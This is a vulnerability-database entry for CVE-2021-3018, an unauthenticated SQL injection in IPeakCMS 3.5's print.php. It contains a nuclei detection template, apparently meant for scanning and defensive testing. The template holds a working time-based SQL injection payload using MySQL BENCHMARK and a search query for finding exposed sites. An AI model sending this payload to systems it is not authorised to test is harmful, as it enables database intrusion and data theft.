
IPeakCMS 3.5 - SQL Injection

03 Jul 2026 13:39:16 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

IPeakCMS 3.5 has an unauthenticated boolean-based SQL injection in the id parameter of /cms/print.php.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ICS | North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | 25 Jul 2024 12:00 | ics |
| ATTACKERKB | CVE-2021-3018 | 5 Jan 2021 05:15 | attackerkb |
| Circl | CVE-2021-3018 | 1 Jun 2021 02:57 | circl |
| CNNVD | Ipeak Ibexwebcms SQL Injection Vulnerability | 5 Jan 2021 00:00 | cnnvd |
| Check Point Advisories | Ipeak Infosystems IbexwebCMS SQL Injection (CVE-2021-3018) | 16 Feb 2021 00:00 | checkpoint_advisories |
| CVE | CVE-2021-3018 | 5 Jan 2021 04:37 | cve |
| Cvelist | CVE-2021-3018 | 5 Jan 2021 04:37 | cvelist |
| Exploit DB | IPeakCMS 3.5 - Boolean-based blind SQLi | 6 Jan 2021 00:00 | exploitdb |
| EUVD | EUVD-2021-26371 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2021-3018 | 5 Jan 2021 05:15 | nvd |

Code

id: CVE-2021-3018

info:
  name: IPeakCMS 3.5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  reference:
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
    - https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3018
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, data tampering, or full database compromise.
  remediation: |
    Apply the latest security patches or update to a version that fixes this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3018
    epss-score: 0.19506
    epss-percentile: 0.9704
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ipeak:ipeakcms:3.5:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 2
    vendor: ipeak
    product: ipeakcms
    fofa-query: body="ipeak" && body="3.5"
  tags: cve,cve2021,ipeakcms,cms,sqli,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /cms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "ipeak", "webCMS-3.5")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /cms/print.php?id=1%20AND%207334=BENCHMARK(8000000,MD5(0x73636a72)) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code == 200'
          - 'contains(body,"onLoad=\"print();\"")'
        condition: and
# digest: 4a0a00473045022100a43b6d204b61732744ca12f634065776bc408a7b45a3ddfe06f29cab519f2d1302202a49932dc9d40dd356fba304b27c7e95278cb71b71368d3746abb7f97b84518e:922c64590222798bb761d5b6d8e72950

Scores as of 04 Feb 2026 07:00 (current):
Vulners AI Score: 7.4 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.19506